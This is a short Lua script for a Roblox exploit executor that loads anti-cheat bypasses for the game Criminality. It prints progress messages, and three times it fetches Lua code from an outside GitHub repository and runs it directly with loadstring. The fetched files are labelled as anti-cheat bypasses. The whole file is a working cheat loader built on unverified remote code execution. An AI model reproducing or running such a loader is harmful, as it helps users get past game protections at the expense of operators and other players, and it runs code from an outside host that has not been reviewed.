print("bypassing stuff hi")
task.wait(1)
print("wait a sec")
task.wait(1)
loadstring((syn and syn.request or request)({Url="https://raw.githubusercontent.com/jahibixd/Criminality/refs/heads/main/WaveDT_Stack.lua",Method="GET"}).Body)()
task.wait(1)
print("Bypass 1 loaded | Wave Stack DTC")
task.wait(2)
loadstring((syn and syn.request or request)({Url="https://raw.githubusercontent.com/jahibixd/Criminality/refs/heads/main/Adonis_namecallinstance.lua",Method="GET"}).Body)()
task.wait(1)
print("Bypass 2 loaded | namecallInstance")
task.wait(2)
loadstring((syn and syn.request or request)({Url="https://raw.githubusercontent.com/jahibixd/Criminality/refs/heads/main/Criminality_ACBypass.lua",Method="GET"}).Body)()
task.wait(1)
print("Bypass 3 loaded | Criminality AC Bypass")
task.wait(1)